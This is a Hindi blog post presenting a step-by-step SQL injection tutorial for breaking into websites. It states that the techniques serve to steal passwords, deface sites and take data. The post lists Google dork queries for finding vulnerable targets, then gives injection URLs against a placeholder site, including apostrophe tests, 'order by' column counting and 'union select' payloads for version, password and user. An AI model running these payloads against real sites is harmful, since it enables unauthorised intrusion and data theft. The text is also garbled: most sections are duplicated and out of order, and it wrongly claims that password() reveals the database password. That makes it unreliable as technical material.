#2 : Hacking Tips
SQL इंजेक्शन tutorial example के साथ
Hindi
पिछले एक दशक मेँ हैकिंग का अत्यधिक विकास हुआ है और नई तकनीकों का आविष्कार हुआ है जो काफी आसान भी हैं। एक आम प्रोग्रामर भी इनका इस्तेमाल कर सकता है और एक vulnerable वेबसाइट को हैक कर सकता है। आज मैं इस पोस्ट में कुछ एक तकनीकोँ के बारे मेँ बताता हूँ जिनका इस्तेमाल करके आप Pro की तरह websites को हैक कर सकते हैं। तकनीकोँ का इस्तेमाल आप पासवर्ड चुराने, वेबसाइट को De-morph करने तथा महत्वपूर्ण जानकारी चुराने के लिए कर सकते है। इन तकनीकों को के साथ पूरा सीखने के लिए आप हमारे dedicated hacking tutorials को पढ़ सकते हैं। आपके पास प्रोग्रामिंग का basic knowledge होना चाहिए जैसे PHP, MySQL इत्यािद।
=========================================================
SQL इंजेक्शन
SQL इंजेक्शन बहुत अधिक इस्तेमाल की जाने वाली तकनीक है। इसका उपयोग data-driven applications को हैक करने के लिए किया जाता है। SQL इंजेक्शन attack में input fields या address bar में वेबसाईट URL के अन्त में malicious कोड को डाला जाता है। इसका इस्तेमाल करके आप किसी वेबसाईट के डाटाबेस में प्रवेश करके डाटा को डिलीट, modify या चुरा सकते हैं। इस पोस्ट मे आपको SQL injection की पूरी process को explain किया गया है।
--------------------------------------------------------------------------------
बहुत से ब्लॉग पर vulnerable sites की लिस्ट होती है।
गूगल डॉर्किंग - इस method में आप गूगल में कुछ एक keywords का सर्च कर सकते हैं उदाहरण -
inurl:index.php?id=
inurl:article.php?id=
inurl:event.php?id=
inurl:buy.php?category=
उपर िदए गए उदाहरणों में से आप किसी एक keyword का उपयोग गूगल के सर्च बॉक्स में कर सकते हैं।
1. Vulnerable वेबसाईट ढूढें
किसी वेबसाईट को हैक करने से पहले आपको एक vulnerable website ढूंढनी होगी। यह काम आप 2 तरीकों से कर सकते हैं।बहुत से ब्लॉग पर vulnerable sites की लिस्ट होती है।
गूगल डॉर्किंग - इस method में आप गूगल में कुछ एक keywords का सर्च कर सकते हैं उदाहरण -
inurl:index.php?id=
inurl:article.php?id=
inurl:event.php?id=
inurl:buy.php?category=
उपर िदए गए उदाहरणों में से आप किसी एक keyword का उपयोग गूगल के सर्च बॉक्स में कर सकते हैं।
--------------------------------------------------------------------------------------------
उदाहरण
http://www.victimsite.com/index.php?id=1'
यिद साईट vulnerable है तो आपकी screen पर एक error आएगी। और अगर वेबसाईट vulnerable नही है तो आपकी screen पर Page Not Found की error आएगी। अगर आपकी स्क्रीन पर MySQL error आती है तो आपने ढूंढ ली है और अगर आपको page not found की error आई है तो आप किसी और साईट को ढूंढें।
2. वेबसाईट की vulnerability check करें
गूगल पर कीवर्ड सर्च करने पर आपकी स्क्रीन पर बहुत से लिंक आएंगे आप उनको बारी - बारी check कर सकते हैं। यह पता करने के लिए कि वेबसाईट vulnerable है या नही। इसके लिए आपको address bar में वेबसाईट के URL आखिर में apostropohe ' डाल कर enter press करें।उदाहरण
http://www.victimsite.com/index.php?id=1'
यिद साईट vulnerable है तो आपकी screen पर एक error आएगी। और अगर वेबसाईट vulnerable नही है तो आपकी screen पर Page Not Found की error आएगी। अगर आपकी स्क्रीन पर MySQL error आती है तो आपने ढूंढ ली है और अगर आपको page not found की error आई है तो आप किसी और साईट को ढूंढें।
--------------------------------------------------------------------------------------------
उदाहरण
http://www.victimsite.com/index.php?id=-1 order by 1
Enter press करने के बाद अगर पेज normally लोड होता है तो आपको statement की value को तब तक बढ़ाते रहना होगा जब तक आपको "Unknown column" की error नहीं आ जाती ।
उदाहरण
http://www.victimsite.com/index.php?id=-1 order by 2
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 3
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 4
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 5
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 6
Error - Unknown column
हमारे example में column 6 पर error आई है इसका मतलब है कि डाटाबेस में column number 6 नहीं है। जबकि column number 5 normally लोड होता है, it means कि database में कुल 5 columns हैं।
3. कुल columns की संख्या ढूंढे
अब आपने vulnerable साईट साईट ढूंढ ली है, आपका अगला कदम डाटाबेस में मौजूद columns की संख्या पता करना है। Columns की संख्या पता करने के लिए के अन्त में ordery by n स्टेटमेंट का उपयोग किया जाता है और parameter की value को minus किया जाता है। हमारे उदाहरण parameter, id में है और value 1 इसकी है।उदाहरण
http://www.victimsite.com/index.php?id=-1 order by 1
Enter press करने के बाद अगर पेज normally लोड होता है तो आपको statement की value को तब तक बढ़ाते रहना होगा जब तक आपको "Unknown column" की error नहीं आ जाती ।
उदाहरण
http://www.victimsite.com/index.php?id=-1 order by 2
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 3
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 4
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 5
पेज normally लोड होता है
http://www.victimsite.com/index.php?id=-1 order by 6
Error - Unknown column
हमारे example में column 6 पर error आई है इसका मतलब है कि डाटाबेस में column number 6 नहीं है। जबकि column number 5 normally लोड होता है, it means कि database में कुल 5 columns हैं।
--------------------------------------------------------------------------------------------
उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,2,3,4,5
Union select के बाद आप सभी columns को comma द्वारा separate करते हुए लिखें। Enter press करने के बाद आपकी screen पर कुछ एक number िदखेंगे, यही vulnerable columns हैं।
उदाहरण
2 4
Example में column 2 और 4 vulnerable हैं, हम column 2 को exploit करेंगे।
4. Vulnerable columns को ढूंढें
अब आपको डाटाबेस के total 5 columns में से vulnerable columns को ढूंढना है, जिनकी vulnerability को आप exploit कर सकते हैं। Column vunerability को पता करने के लिए union select स्टेटमेंट का इस्तेमाल किया जाता है।उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,2,3,4,5
Union select के बाद आप सभी columns को comma द्वारा separate करते हुए लिखें। Enter press करने के बाद आपकी screen पर कुछ एक number िदखेंगे, यही vulnerable columns हैं।
उदाहरण
2 4
Example में column 2 और 4 vulnerable हैं, हम column 2 को exploit करेंगे।
--------------------------------------------------------------------------------------------
उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,version(),3,4,5
5. डाटाबेस version पता करें
Vulnerable column choose करने के बाद अब आपको डाटाबेस का वर्जन ढूंढना है। इसके लिए आप choose किए गए vulnerable column को version() से replace करें।उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,version(),3,4,5
--------------------------------------------------------------------------------------------
उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,password(),3,4,5
6. पासवर्ड प्राप्त करें
Database का पासवर्ड हासिल करने के लिए version() को password() से replace करें।उदाहरण
http://www.victimsite.com/index.php?id=-1 union select 1,password(),3,4,5
--------------------------------------------------------------------------------------------
http://www.victimsite.com/index.php?id=-1 union select 1,user(),3,4,5
7. Username प्राप्त करें
यह database के admin का username होता है।http://www.victimsite.com/index.php?id=-1 union select 1,user(),3,4,5
--------------------------------------------------------------------------------------------
.m@
My Site : iitboss.com
No comments :
Post a Comment